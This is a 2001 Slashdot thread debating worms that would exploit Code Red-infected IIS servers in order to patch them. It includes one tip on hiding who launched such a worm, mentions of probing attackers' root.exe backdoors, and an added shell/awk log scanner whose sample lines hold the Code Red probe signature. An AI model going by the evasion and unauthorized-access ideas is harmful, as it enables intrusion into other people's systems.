    ok then your [sic] infringing on my copyright! Could you as [sic] me next time before STEALING my comments for your own?
  125. Re:Funny, by gupta · · Score: 1

    I agree. This past Monday when I first logged in, my W2K told me it would shut down in 2 minutes because it had just installed an anti-Code-Red. This is itself exactly a virus: executing something without the owner's consent...

  126. Re:Why do favors? by Anonymous Coward · · Score: 0
    So let me get this straight: IF you use IIS, then tough shit, right? Well, what a great attitude. Unfortunately, these Admins with vulnerable boxen help to bog down traffic globally. So letting Admins who "made their bed[s]" sleep in them is a ridiculous comment.

    If you're going to spout anti-MS rhetoric, at least have something constructive to say...

  127. Marvin the Martian by IainMH · · Score: 1

    "The submittor raises an interesting question - is this possible?"

    Hemos: now read this out loud to yourself in the voice of Marvin the Martian.

    N.B. It is spelt 'submeter'.

    ~Iain

    1. Re:Marvin the Martian by Anonymous Coward · · Score: 0

      >It is spelt 'submeter'.

      Good joke, man.

    2. Re:Marvin the Martian by Anonymous Coward · · Score: 0

      You mean like with a Zed?

    3. Re:Marvin the Martian by Anonymous Coward · · Score: 0

      N.B. It is spelt 'submeter'.

      Actually it would be spelt submitter if it was a word. I don't think it is.

      Oh wait, you're British, nevermind. But don't go correcting our Americanized (with a z) spelling.

    4. Re:Marvin the Martian by Anonymous Coward · · Score: 0

      you are all morons:

      From Webster's Revised Unabridged Dictionary (1913) [web1913]:

      Submitter \Sub*mit"ter\, n.
      One who submits. --Whitlock.

  128. Possible but not a good idea by Control-Z · · Score: 1
    I'm sure you could write a "good worm" to roam the Internet and patch IIS servers. But you'd still be executing your code on other people's servers, even if your intent is honorable. Not a good idea.

    There have been "good worms" released on the Internet before that had bad bugs. I wouldn't want the FBI knocking on my door and taking all my computers when something went wrong.

    1. Re:Possible but not a good idea by Borogove · · Score: 1

      If the 'good worm' worked by waiting for connections from infected machines, AND it cleared up all traces afterwards (other than a note to the sysadmin to explain what had happened), AND you launched it from a machine running W2K+unpatched IIS, then it would be very difficult for anyone to prove that YOU were the instigator. As far as anyone could tell, your machine had been infected by the 'good worm', which started sending copies of itself to other machines.

      --
      There has been a major scientific break-in
  129. Re:This is a Bad Idea by daveisoverlord · · Score: 1
    but in this case, if somebody wants to leave their box open - through ignorance, laziness, or some other ineffable reason - that is their choice

    Leaving your box open harms me if it's used to attack me. This sounds like the smoker's argument that they should be able to smoke wherever they want. Of course, society is increasingly disagreeing with that argument.

    Of course the other point I think that needs to be made, is that I believe the majority of those people don't WANT their boxen to be open. That's why they call it exploited. I don't think it's their choice. I don't believe negligence, by definition, is a choice. Personally, I would chalk lack of patching up to lack of foresight (it's a little gentler than stupid).

    --
    The perception of reality is more important than reality itself.
  130. @Amiga it was a virus-killing Virus by Anonymous Coward · · Score: 0

    It has been done before, not on the net but on the Amiga. It was anti-virus software that had a virus-like effect. It spread itself and killed off viruses at the same time.

  131. FFS Hemos by Anonymous Coward · · Score: 0

    There have been (at least) three Code Red related stories on slashdot and this very possibility has been discussed every time. In multiple threads.

  132. Re:It's entirely possible by Tut'n'common · · Score: 1

    A good reason to live in South Carolina. The Attorney General recently announced "Open Season" on home invaders. If someone breaks into your house, he says, shoot them dead. He has specifically instructed all prosecutors in the state to *NOT* charge anyone with shooting a home invader.

    --

    "I was a geek before it was cool" --Me
  133. Discussed before by egjertse · · Score: 2, Insightful
    This has been discussed before, among other places on Bugtraq. The concept has many flaws:
    • The morality aspect - you are "taking control" of someone else's hardware/software
    • The legal aspect - this still constitutes "cracking" as you have illegally gained access to a computer system that is not yours. Breaking into someone's house is not OK just because you only intended to do their dishes.
    • The practical aspect - the worst side effect of internet worms is not primarily damage done to the infected systems, but bandwidth consumed and resources depleted as a result of the worm spreading.
    I don't know of any real-life implementations of this (I somehow have the feeling I have heard of it, but it escapes me right now), but the concept has been debated at length during prior "worm attacks". There are probably many other reasons why this is not a good idea, but I think these are the most significant.
    1. Re:Discussed before by startled · · Score: 2

      The third one, the practical aspect, is completely false. If you only propagate and install the worm to systems that probe you, you are reducing bandwidth by preventing those systems from sending a gazillion requests.

      The first one, the morality aspect, is debatable. Many people would argue that cleansing their system of the virus is entirely ethical.

      The legal one is the only one that seems cut and dried. Even if default.ida was a program, and you're just responding to their request, it seems your intent is fairly obvious, and the courts would recognize that. So yeah, you'd probably get hauled off to jail.

  134. Digital war...? by I.+M.+Bur · · Score: 1

    I'm quite sure that any anti-worm will in no time be countered by a new version of the original worm, which is (a) immune to your anti-worm, and (b) killing all your anti-worms it meets...
    Will make quite a big digital war, between those worms and their counterparts...

  135. This is surely going to be the next Core Wars by Anonymous Coward · · Score: 0
    I've looked long and hard for a game that I could create that would basically cater to the person who cheats the most. Some people have said that games like Ultima Online do this to an extent.

    Virus writing in the real world is an abhorrent practice, though I'd be surprised if anonymous groups don't start "tagging" machines, battling back and forth with the exchange of virii/worms to claim the world.

  136. Why not? by Aerog · · Score: 2, Insightful

    I don't see how it could be a problem. I mean, logically, only something like a DoS attack or the like can't be "undone". If it's a bug in the individual system then it should be able to be fixed. The problem arises with the media stigma of a virus.

    Now this just goes right back to the whole "but I thought a virus was bad" response that your typical user will tell you. For the most part, it could work wonderfully, but the big thing is, the only people who will need it are those who did not patch a system for the bug (since if they patched it, then the retrovirus (if you will) will not be able to use the same vulnerability). Those are most often the same people that opened 40 SirCam attachments even though they were warned ("But it came from my best friend!"). To these people, a virus is something to be afraid of, regardless of purpose. A virus is always a bad thing that will "break the computer" and we don't want to "break the computer" because we can't "fix the computer" <Cue ominous music>

    But then again, if these people are so oblivious as to how they're infected, then it just may work as long as the media doesn't blow it out of proportion again.

    --
    - Relativistic? That's barely Newtonian!
  137. Re:It doesn't cost a dime to pay attention... by JayHerrick · · Score: 1

    It's not the "good" admins causing the problem, it's all the "default" IIS installs at people's houses with no firewall between them and their cable modem.

    (By the use of "good" in describing a MS admin I only intend it as relative to other MS admins)

  138. Re:It's entirely possible by egregious · · Score: 1

    If you are in a dark alley somewhere, and there is one other person, and he draws a gun on you, indicates an intent to harm you, you have the right to use your weapon ONLY IF that is your last resort.

    Actually, that's not true, at least in Virginia. There is little to no notion in American law requiring evasion on the part of the attackee. Virginia law reflects this, allowing you to shoot before you run. In fact, you can respond with deadly force anytime your life is genuinely threatened (i.e., not a little old lady beating you with a stick but a 6'4" giant beating you with a baseball bat). Most places in the US are the same way.

    You are correct that there is no civil concept of self-defense. Those suggesting that a direct invasive response is anywhere close to appropriate as a response to a virus are kidding themselves.

  139. Makes me nervous. by FrankieBoy · · Score: 1

    It kinda boils down to: Do you want ANY unknown software running around on your system, even if its intentions are good? I think that if I had the choice of allowing "good" viruses on my system, I would decline. Maybe a worm that finds/exploits a weakness in your system could just leave a calling-card text file somewhere to alert you to the issue. It reminds me of the old cartoon where they bring in a cat to chase away the mouse, then they have to bring a dog to chase away the cat, etc., etc., etc.

  140. Re:It's entirely possible by Rinikusu · · Score: 1

    Break into my house, you die.

    Throw away my coffee, you die slowly.

    :)

    --
    If you were me, you'd be good lookin'. - six string samurai
  141. Re:It's entirely possible by Anonymous Coward · · Score: 0
    This is incorrect. English Common law gives us the "castle doctrine"--which says that a man's house is his castle, and he has no duty to retreat from it. Doesn't mean you can shoot someone inside your home with impunity, but that there is NEVER a duty to retreat. Some states (e.g., Florida, Oregon) have a "duty to retreat" on the books, others do not (e.g., Washington).

    There was a misguided case in MA that tried to establish a precedent of required flight from the home, but that was a) related to a domestic abuse situation and the assailant was also a resident of the house, and b) has since been clarified in MA state law by the legislature.

    And no, I'm not a lawyer, just an LFI graduate.

  142. Re:That's an illegal law. by jeremyp · · Score: 1

    I'm not from the US, so I'm curious. You think the right to bear arms is the equivalent to the right to gun somebody down because they trespass on your property?

    I think killing somebody is a little extreme as a punishment for a bit of burglary.

    --
    All I want is a secure system where it's easy to do anything I want. Is that too much to ask ~~ Randall Munroe
  143. Defense department research by Rimbo · · Score: 2

    Is this part of the problem?

    I have a friend who works for a company that's doing just this. They are funded by the government to write intelligent agents ("agents" in the sense of mobile code) for security purposes. So rather than merely setting up a firewall, the goal of this is to write software that can move from machine to machine, like a virus, and stomp out viruses, trojans, and fight off other attackers.

    Call it a white blood cell.

    So is developing a counter-virus, an antibody, a white blood cell being part of the problem? I don't think so. Once a computer's been hacked, it's already been hacked. It's already been violated. If you don't want people to write counter-viruses, for heaven's sake, don't let your computer get infected in the first place! Viruses are preventable.

  144. Re:It's entirely possible by DragonPup · · Score: 1

    Actually...you CAN'T shoot someone for merely trespassing or breaking into your home. Legally, they must pose a threat to you, family, etc. in the house. If they pull a knife (for example) in your house, you can let them enjoy a hot lead injection though.

    -Henry
    Not a lawyer, but took a year of law in high school...

    --
    "Useless organic meatbag" -HK-47
  145. Re:It's entirely possible by jgerman · · Score: 2

    You'll find plenty of cases where a criminal harmed by a victim who was protecting himself has successfully sued for damages.

    --
    I'm the big fish in the big pond bitch.
  146. Funny, by mackman · · Score: 0, Troll

    I've always considered Windows Update the anti-virus virus.

    1. Re:Funny, by BigBlockMopar · · Score: 3, Funny

      I agree. This past Monday when I first logged in, my W2K told me it would shut down in 2 minutes because it had just installed an anti-Code-Red. This is itself exactly a virus: executing something without the owner's consent...

      This past Monday? Wow. I see your administrators take their time, don't they? Or did they wait until they'd been infected to decide that it might be time to take preventative measures?

      --
      Fire and Meat. Yummy.
    2. Re:Funny, by Anonymous Coward · · Score: 0

      shows what you know

    3. Re:Funny, by RetryIgnore · · Score: 1

      Windows Update won't install anything without your consent. It doesn't work like that.

  147. writers: virus has no plural by Anonymous Coward · · Score: 0
  148. Could go horribly wrong by Anonymous Coward · · Score: 0

    I forget the actual virus names, but years ago a virus appeared to try and do just that. Unfortunately it had a bug, and became more prevalent and destructive than the virus it was trying to remove!

  149. Re:So the solution would be... by Have+Blue · · Score: 2

    Although this is probably an urban legend, I have been told of someone to whom SirCam emailed Windows XP RC1. So yes, it is theoretically possible ;)

  150. Absolutely Not! by crombie · · Score: 1
    That's a bad idea, just because the code that you write for your "virus hunter" of sorts could be buggy as well, and as it propagates itself, it could crash others' machines. I would be extremely pissed off if someone's anti-virus virus crashed my machine, very pissed...

    Although the current method of anti-virus software is not perfect, because of people not having the software or updated virus definitions, it's currently the best way, and there are definitely improvements to be made in the field.

    -crombie

  151. Re:It's entirely possible by Anonymous Coward · · Score: 0

    What? I don't know about you, but I keep my doors locked. No one is going to come randomly "wandering in." If they're in, it's because they were determined to get in, for whatever reason.

    Your post makes no sense.

  152. Try this to notify users by Jimithing+DMB · · Score: 1

    On my server I have a shell script run by the webserver which echoes the REMOTE_ADDR variable along with the current time into /tmp/cripfifo (Code Red IP FIFO). From there I have a script that I run as another user that does an endless loop of cat /tmp/cripfifo | while read i, which then loops and for each line it inputs (which is actually probably only 1 since the fifo is closed each time the webserver script writes into it). With each line of input it first checks to see if there is a file named $REMOTE_ADDR* in the errorips directory. If not, it runs another script in the background which uses wget redirecting output into errorips/${REMOTE_ADDR}_TIME. If it succeeds it moves that file into the processed/ directory, which means that if the machine attacks again it will repeat this process each time it attacks.

    Yeah, I know there are some race conditions if the same IP gets processed before the other one has had a chance to write the logfile. It's not a big deal though, and the chances of that happening are slim anyway unless someone is just bombarding you with attacks in which case it still doesn't matter.

    See http://kernelrpm.sourceforge.net/codered/ for the scripts. Note, it may be a better idea to use the Location directive for /default.ida and point it to the script rather than making the whole damn directory ExecCGI. Although I don't have a problem doing that since only I have access to it anyway.

  153. Sorry, but wasn't this sort of done already? by Touby · · Score: 1

    In an earlier slashdot article (http://slashdot.org/articles/01/01/18/0141232_F.shtml) a text was mentioned that describes the early WANK worms, and, at the least, implies that a worm-killing worm has (successfully) been implemented, and was (I think) only the third worm ever widely released (preceded by father christmas and the first WANK worm...).
    Anyway, here's a snippet from the text: "It was also designed to hunt down and kill the decoy-duck program. In fact, the SPAN network was going to turn into a rather bloody battlefield. This worm didn't just kill the decoy, it also killed any other copy of the WANK worm. "

  154. White hat worms by Magius_AR · · Score: 1
    I've seen a lot of posts regarding the legal implications of white hat worms due to the fact that you are "trespassing" on property that isn't yours.

    However, there's another (imo more significant) implication to consider. The intense global network traffic caused by spread of Code Red practically brought the Internet to its knees for a couple days due to the sheer magnitude of data travelling over the wires. Worms double effectively as DoS attacks even when not attempting to. Now, as bad as the Code Red infestation hammered the internet, releasing an equivalent White Hat worm could significantly _increase_ the amount of traffic out there. Put enough worms out there, good OR evil, and you'll eventually get to the point where the whole damn internet is DoS'ed.

    Magius_AR

  155. Re:Breaking into a house to install a better deadb by Anonymous Coward · · Score: 0

    More like locking a house which you see isn't locked. Cops have been known to rattle doorknobs.

  156. Re:It's entirely possible by DeePCedure · · Score: 1

    Clue: threatening someone with deadly force and cracking their webserver are not even remotely of the same magnitude.

    Yes, but criminal trespass (a crime to which an American citizen can respond with deadly force) and cracking a webserver are of the same magnitude.

  157. Re:net police by _ph1ux_ · · Score: 1

    I own a very large store - and I had the building designed and built by one of the most well known store building contractors in the world.

    It's a huge store - I employ many many people, and we sell a lot of stuff... but in the past 5 years that I have been in business I have had several break-ins where people keep stealing all my stuff - or just trash the place and destroy all our merchandise so that we are out of business for a time.

    I have contacted the police and they have investigated and determined that the building was designed with doors, windows and locks that can be opened by people who know how they work without having to have a key. Every time I get robbed or trashed the contractor comes out and fixes the locks or doors or windows, but it happens too often. I can't replace the building with one that is made by a different contractor because that would be too expensive - I would have to train my staff again, and teach them where everything is located because that contractor can't build a store that is of the same configuration...

    so I am stuck with the building I have - and these vandals and thieves keep finding ways of breaking into the building that I own - well I don't really *own* it, I am leasing it from the contractor - but apparently even though the contractor owns it - they apparently have no legal responsibility for the property.

    I have been told that I cannot sue the contractor for providing me a building that has design flaws which allow breakins which cause my business to be unable to accept customers and make money - because I apparently agreed to their lease terms.

    ***

    And microsoft laughs all the way to the bank.

    We should start a class action suit to get MS to adhere to the license policy - seeing as how they OWN the software we RENT from them - it is THEIR responsibility to fix the fscking leaking faucets.

    If my house burns down because of a flaw on the designer or landlords part I sue the pants off em.

    let's get M$ to be responsible for God's sake and stop bitching about whether or not the fscking design of white-hats is ethical. we keep focusing on the symptoms and not the root cause. FAULTY SOFTWARE IS RESPONSIBLE - not the damn virii.

  158. Re:It's entirely possible by cheshire_cqx · · Score: 1
    Once the attack is over, you go to the police. In our society, normal citizens are only allowed to use force that would otherwise be illegal when the police are out of reasonable reach...Like when you have a shotgun in your face.

    Sort-of. You are allowed various self-help remedies under certain circumstances.

    Also, you *do not* need the police under many sets of circumstances. You can obtain court orders in the civil context that allow you access to seize the property of others (although you may need the Sheriff or US Marshal to preserve the peace or execute the court order).

    Also, the police have exactly the same rights as other citizens to use reasonable force, up to and including deadly physical force. They may use it to protect themselves or others from imminent danger. The practical side, though, is that--cop or no cop--if you use deadly physical force you'd better be right, or your butt is toast. Cops might get more of a benefit of the doubt on this as a practical matter, because we entrust this function to them. (There are also rules regarding the arrest aspect of physical force, but I'm talking here about the self-defense aspect.)

    My second scenario is like a trespass analogy (and as I said, is likely illegal as I phrased it). Trespass is justified under many circumstances.

    You are right, though--with regard to physical force or other intrusions upon the person or property of others, you must generally stop once the exigency is over and resort to the cops or the courts before you go further. Remember, even the cops will need the power of the court under most circumstances (search warrant, arrest warrant, etc.) just like an individual (writ of replevin, forcible entry and detainer (for evictions), seizure of evidence for a civil matter, and so on).

  159. DirectTV hacked the hacker.... by FortKnox · · Score: 2

    Remember the DirectTV anti-hack on the hackers? Seems like this is the same idea. Anti-virus the virus...

    Hey, if it worked for DirectTV, it should work here...

    Actually, this may start a "best of the best" competition with virus writers. They'll come back with a virus to counteract the anti-virus, and on and on.... might be interesting...

    --
    Good quote, too many chars. Seriously, the slashdot 120 char limit sucks!
    1. Re:DirectTV hacked the hacker.... by Coq · · Score: 2, Insightful

      Ok, what direcTV did is not exactly the same. They were much nastier. Also, the people who were affected by direcTV were not hosts to some virus. They were willing participants. An equivalent would be the DVD CCA putting out a virus to kill DeCSS. If a company like microsoft were to do something like this to viruses, it would only close the door for that virus. It wouldn't kill the machine, or write "Game Over" or anything fun like that. It also wouldn't close any other doors, as they would still be unknown. As far as an arms race goes, it would be no different than now. Except, now that I think about it...

      Virus writers would close the door they came in in advance and write in another door that would be extremely hard to find. The worm would still infect other machines, and it would be a very long time before the other back door kicks in. People would think the worm they got was a purposeful fix worm, when in actuality it would only be a matter of time before it became a zombie. Now that would be a smart virus. Of course, the hardest part would be giving the new back door the functionality needed while effectively hiding itself.

      --
      Information wants Coq
    2. Re:DirectTV hacked the hacker.... by IronChef · · Score: 2

      Dish Network sent down an ECM that destroyed the satellite receiver -- it didn't mess with the card, which is Dish's property -- it rewrote the receiver's flash with a new program that locked out all the channels except for a "stop stealing TV" message. Many people who were using an emulator board without locking the flash RAM in the unit got their boxen cooked but good.

      I think that DTV's card-melting is kosher, they do state that the card is their property. (as does Dish.) But Dish frying your personal hardware -- whoa. That seems to cross a line, even if you are using it to pirate TV. Ethically, it seems to be a much more questionable activity than releasing an anti-virus virus.

    3. Re:DirectTV hacked the hacker.... by seann · · Score: 0

      come on
      that was the exact same thing
      what if MS sent out an automated patch to everyone on the internet that was registered to their service, and patched their machines?
      huh?

      Think before you type.

      --
      I'm a big retard who forgot to log out of Slashdot on Mike's computer! LOOK AT ME.
    4. Re:DirectTV hacked the hacker.... by Anonymous Coward · · Score: 0

      Moderate above to -1 Flamebait. That poster is obviously infected with Code Red.

    5. Re:DirectTV hacked the hacker.... by wackysootroom · · Score: 1

      The only thing that DirectTv 'Hacked' was their own equipment. There is a world of difference between that and unleashing a plague of an 'anti-virus virus', which if not coded immaculately carries its own implications, a la the Xerox friendly network worm experiment that rendered the network useless. What Dtv did was totally legal because they were not electronically trespassing.

  160. Have we already forgotten the Cheesy Worm? by hubie · · Score: 2
    Recall that there was the "white hat" Cheesy Worm that fixed the "linux worm" or "linux virus" (or however the BIND worm was misreported).

    See this link for example.

    1. Re:Have we already forgotten the Cheesy Worm? by Anonymous Coward · · Score: 0

      Lion Worm had a variant that would patch your system for you. Do you really want anyone else being able to root your box? How much do you trust roving code?

  161. Re:It's entirely possible by Anonymous Coward · · Score: 0
    I'm sure folks will scream it's illegal and it probably is - but can't a case be made for 'self defense'? I mean, if someone brandishes a gun at me am I not within my rights to shoot them or at least take their gun away?

    Clue: threatening someone with deadly force and cracking their webserver are not even remotely of the same magnitude.

  162. The MacOS Autostart worm by SirDrinksAlot · · Score: 1

    A while back there was a vicious little bugger going around called the Autostart worm, it was evil. It made its way onto CDs and across networked Macs. While this was happening MacAddict released a CD and it was infected. But curiously enough, it was a good worm. (i wonder how it got there!) Said worm would infect your machine and spread like the others, but the main difference was it would remove other autostart worms and destroy itself after Christmas day.

  163. It's not 'virii'! by The+Wing+Lover · · Score: 2, Insightful
    ...it's Viruses. VIRUSES! VIRUSES!

    check out http://www.cknow.com/vtutor/vtplural.htm for more information...

    (rant mode off)

    --

    - In Capitalist America, law violates YOU!

    1. Re:It's not 'virii'! by Anonymous Coward · · Score: 0

      Thank you for a little bit of sanity in this pseudo-intellectual world of Slashdot.

  164. Darwinian Predator - Prey relationship on the net by hillct · · Score: 5, Insightful

    So now you have a bunch of viruses, and counter-viruses roaming the net. This is not so bad until you have self-mutating viruses and antigens, several generations down the line. Eventually chaos theory will dictate that the nature of the relationship has become so complex as to be unknowable. This is a Pandora's box we don't want to open. It's similar to the human cloning issue, in that there are a lot of good arguments not to do it, but there's one overwhelming argument for making it legal, licensed and monitored; that is, if it's not legal, those who choose to pursue it will not be hindered in that activity, but will be forced to pursue it without oversight, while in hiding and possibly in poorly controlled conditions.

    All you can do here is appeal to the logic of those who would pursue such an activity and suggest that they not undertake it, but regardless of how much you argue, convince and suggest, someone will eventually do it and there will be severe consequences - not all negative, but severe, with respect to how we look at technology and how we use it.

    It could further be argued that those against such undertakings need to adjust to changing technology and make the appropriate changes to their world view. This is what the recording industry is having to do, as well as companies in other well established industries. The same will eventually be true of how we look at software design (computer viruses), and biology (human cloning).

    --CTH

    --

    --Got Lists? | Top 95 Star Wars Line
  165. It's called a patch, jeez by Cheesy_Poof_Man · · Score: 1

    A patch can do the same thing with less potential of harming the user's machine. If they just got off their lazy asses and dl'ed it instead of waiting for someone else to do it to them.

  166. Worms Are People Too by noelbush · · Score: 1

    This only shows how words like "worm" and "virus" are inadequate metaphors already stretched to the breaking point. The fact is that a worm or a virus or any other piece of software is not a separate entity that "goes out and does something" -- it is you. If you write a worm that is meant to propagate through the net and alter something on other people's property, it's you that is doing all the damage, not the worm. Any computer program is just a cybernetic extension of your own limited capabilities to make decisions and take actions.

    Vigilantism is generally considered to be an enemy of a civil society. You have no more right to trespass onto other people's property to battle a worm-writer than the worm-writer has the right to do the initial trespassing. The implicit agreement among system administrators across the net that hacking to find security holes is an acceptable and beneficial exercise is long gone, ever since the net became a commercial field. A commercial field has a different structure of trust, one in which vigilantism can play no part.

  167. The law's not on your side by anonpoet · · Score: 1

    The last guy that tried that went to jail. I wish we could. I could fix code red in two hours.

    1. Re:The law's not on your side by Anonymous Coward · · Score: 0

      Yeah, you go patch microsoft.com with the Apache patch and see if you get sued or not... AC

    2. Re:The law's not on your side by kraig · · Score: 1

      I can see being sued for it. Your worm that connects to my system and patches it for me is just as wrong as somebody else's worm that connects to my system and infects it for me. You're using resources without permission, for one. You're also opening yourself to litigation: what if your patch breaks something in a mission-critical server? Yes, that server should have been patched versus Code Red long ago, but that doesn't give you the moral right to fix it for me. ("You" is being used here in the generic sense, not in the sense of "you, acidrain, to whose post I am responding".) I would feel just as free to submit generous LARTs to somebody who was "just trying to help" as I would to somebody who was proving their manhood before the "virus writing community".

  168. Inoculation worm by Demon-Xanth · · Score: 1

    I've been wondering why this worm doesn't exist: It sends itself to everyone in your email list. It disables Outlook running .vbs, .com, .pif, and .exe attachments. It disables .vbs files for the whole system.

    --
    If you think education is expensive, you should try ignorance -- Derek Bok, president of Harvard
  169. Re:Because of this the internet is dying.. by cybrthng · · Score: 2
    well, there is more than slashdot, bsd and such, but our freedoms are definitely going..

    i live to see the world, be there for my family, and be who i am, but the government and monopolies sure are good at fudging things up.

  170. I keep saying the same thing by Anonymous Coward · · Score: 0
    Only goddamn computer geeks say "virii" because they think they're being clever, trying to impart a Latinate conjugation onto an English word.

    Any time anyone says or writes "virii" you know you're dealing with someone who'd rather appear clever than correct.

  171. Get off of your high horses. by fmaxwell · · Score: 2
    I don't care about the legality, ethics, morals, etc. of this. If some idiot, after weeks of warnings in the popular press, still has not installed the patch, he better find a way to keep the virus on his system from attempting to infect my computer. Otherwise, his system is fair game as far as I am concerned. Since the legal system is not punishing these people, I might.

    Let's also drop the insane analogies comparing this to someone threatening a family member's life. It's just a bunch of computers.

  172. Re:There is another way... by friscolr · · Score: 4, Informative
    You don't need to do the lookups/etc. yourself. You can help SecurityFocus send out the mail.

    from the bugtraq post:

    To: BugTraq
    Subject: Infection Notification
    Date: Sun Aug 05 2001 10:50:22

    If you'd like to help us notify users they are infected please send offending IP data to aris-report@securityfocus.com. Please use the following format:

    IP ADDRESS DATE/TIME WITH TIMEZONE

    Or something similar to this. Please ensure the information is constrained to IP address and date per line as we do our notification automatically and our systems need to be able to understand the data you send us.

    --
    Elias Levy
    SecurityFocus.com
    http://www.securityfocus.com/
    Si vis pacem, para bellum

    ---end bugtraq post---
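    As an added example serving both the FIFO/log pipeline described in comment 152 above and the report format asked for in this post (it is not code from either poster, nor from the kernelrpm.sourceforge.net scripts), this POSIX shell function scans web server access-log lines for the Code Red /default.ida probe and prints one "IP ADDRESS DATE/TIME WITH TIMEZONE" record per attacking host, deduplicated the way the errorips/ directory check works. The log lines, IP addresses and timestamps are constructed, not real observations.

```shell
# Added example, not code from the Slashdot posts or from the kernelrpm.sourceforge.net
# scripts they link to. Reads web server access-log lines on stdin and prints one
# "IP ADDRESS DATE/TIME WITH TIMEZONE" line per host that sent a Code Red probe,
# which is the per-line format the SecurityFocus notification post asks for.

# Constructed sample log lines in Apache "combined" format. A request for
# /default.ida followed by a long run of N or X padding is the Code Red probe;
# the /index.html line is ordinary traffic that must be ignored, and the second
# probe from 192.0.2.10 is a repeat that must be reported only once.
SAMPLE_LOG='192.0.2.10 - - [05/Aug/2001:10:50:22 -0700] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858 HTTP/1.0" 404 280 "-" "-"
198.51.100.7 - - [05/Aug/2001:10:51:03 -0700] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/4.0"
192.0.2.10 - - [05/Aug/2001:10:52:41 -0700] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858 HTTP/1.0" 404 280 "-" "-"
203.0.113.44 - - [05/Aug/2001:11:02:17 -0700] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858 HTTP/1.0" 404 280 "-" "-"'

# codered_report: filter a combined-format log on stdin down to report lines.
# Field layout of a combined log line, split on whitespace:
#   $1 client IP, $4 "[dd/Mon/yyyy:HH:MM:SS", $5 "zone]", $6 "\"METHOD", $7 request path
codered_report() {
    awk '
        # A probe is a request for /default.ida whose query string starts with the padding run.
        index($7, "/default.ida?") == 1 && substr($7, 14) ~ /^[NX]+/ {
            ip = $1
            # One notification per host, the same idea as the errorips/ check in the post.
            if (ip in seen) next
            seen[ip] = 1
            ts = $4; tz = $5
            sub(/^\[/, "", ts)   # strip the leading "[" from the timestamp
            sub(/\]$/, "", tz)   # strip the trailing "]" from the timezone offset
            print ip, ts, tz
        }
    '
}

# Stand-alone run: report the probes found in the constructed sample.
# Prints two lines, one for 192.0.2.10 and one for 203.0.113.44.
printf '%s\n' "$SAMPLE_LOG" | codered_report
```

    In the FIFO setup from comment 152 the same function can sit on the consumer side, reading the lines the webserver script writes instead of a log file.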

  173. Err by Anonymous Coward · · Score: 1, Insightful
    ... exploited the back door, closed it, then started sending itself to other servers for a certain period of time?

    Anybody think about the bandwidth implications of this? We'll have anti-viruses counteracting viruses, viruses counteracting the anti-viruses, etc. This will all eat up bandwidth just as bad as Sircam and Code Red have.

  174. isn't it their own fault by womby · · Score: 1

    while I do agree it is their own fault for picking such a useless product, the idea of fighting fire with fire is an interesting one. but who would want to tread the thin line and do it.

    why would Symantec or Network Associates want to do it. there would be less reason for people to buy their products. if a "whitehat hacker" (I hate that term) decided to make the anti virus we can guess that the fbi would be sent down to beat down his / her door because obviously he / she is a hacker who must be stopped

    --
    **** lying is wrong even for sleeping dogs
    1. Re:isn't it their own fault by Anonymous Coward · · Score: 0

      --it is their own fault for picking such a useless product-- useless? have you yourself used IIS/PWS? do you know the benefits/costs? don't say one of the costs is the fact that it has a hole, all software has some sort of hole. if you're gonna call something useless you better define how it is useless or just admit that perhaps your evil adversary microsoft does make some useful products. i am by far no bill gates worshiper yet even i recognize this.

  175. It doesn't cost a dime to pay attention... by miked50 · · Score: 1

    Why not let the sysadmins who chose to use IIS keep up with the latest security patches and such? There was so much hype surrounding Code Red that no one should have been severely affected by it. Surely if your sysadmin is worth his salary he will keep up with the latest news... I'm not saying that he/she knows every security hole and exploit out there, but they should try to keep track of the big ones at least

    That's just my $0.02

  176. Illegal by 3prong · · Score: 4, Insightful

    I keep seeing people talk about how invading a server in some cases is legal, because "the intent was good". That is an incorrect interpretation of the word intent. Intent only refers to the crime itself, i.e. did the criminal intend to break-and-enter or was it accidental.

    This means that unauthorized access in the attempt to do a "good deed" is just as illegal as black-hat unauthorized access.

    For this to happen, someone with the antidote virus would have to break the law to spread it and apply it. Of course, Robin Hood was considered a criminal too.

    1. Re:Illegal by Genetically+Enginerd · · Score: 1

      You are correct about the legality, but there is the issue of mitigating circumstances. I would think that any prosecutor would think twice about going forward with a case where it would be very difficult to find a jury that wouldn't be sympathetic to the perpetrator, especially if the worm was actually shut down.

      On the less serious side, some suggestions have shown the use of the backdoor to pop up a page in their browser. Have that page state something like

      "Excuse me, but we have noticed that your system has been infected with the CodeRed virus. We are offering a complete solution to the problem. If you do not wish to participate, you may OPT-OUT of this offer by clicking the 'Yes - I do not want to participate' or the 'No - I want to participate' buttons below."

      Have about a 3 second timeout on the window. Tell the judge it was an honest programming error and you wanted to give them 3 hours and you had issued a patch notice, but nobody had applied it.

      --
      Does the income I've derived from working with Unix belong to SCO?
  177. Yet another metaphor by Anonymous Coward · · Score: 0

    Here is my throw at the metaphor stakes... It's like someone comes to your home and breaks your coffee maker, then finds the address of all your friends and visits them, if they have a jar of 'Outlook Expresso' in the kitchen, then they break that coffee maker. Now aware that this person has visited your house you become enraged enough to set out for revenge. You start by visiting all your friends and try to fix their coffee makers (even if they're not broken) and then move on to visit their friends. Now the question is... which note do you leave on the kitchen table. a) Hey Joe I fixed your coffee machine b) Hey Joe I fixed your coffee machine, sorry for breaking it in the first place c) Hey Joe you owe me $40 for the visit. I like the E-Ambulance chasing option.

  178. Re:Darwinian Predator - Prey relationship on the n by Coulson · · Score: 1
    I think we're still a long way from the idea of self-mutating pathogens. These exploits are too specific and technical for a virus to change its infection vector. Only the payload is likely to mutate, and the retroviruses are targeting/patching the infection vector. No matter how many ways the nasty payload changes, it's getting onto the system in the same fashion. If that hole can be patched, it doesn't matter what the virus mutates into; it can't infect the host.

    Imho, retroviruses are an elegant solution to a serious problem. Though they only stop a single type of virus (whereas education can help stop ALL viruses), they're a powerful tool.

    I will dance for joy the first day I see an easy-to-use anti-virus creator package, to combat the virus writer packages out there.

  179. Check your logs - Someone's already doing it by Anonymous Coward · · Score: 0

    I just took a sample of the addresses in my access_log over the past hour. At least 50% of them don't respond. Most of the ones that do don't respond to root.exe (some did so I know I did it correctly)

    Seems to me like someone is already taking matters into his/her own hands...

  180. Bad, very very bad idea by friday2k · · Score: 1

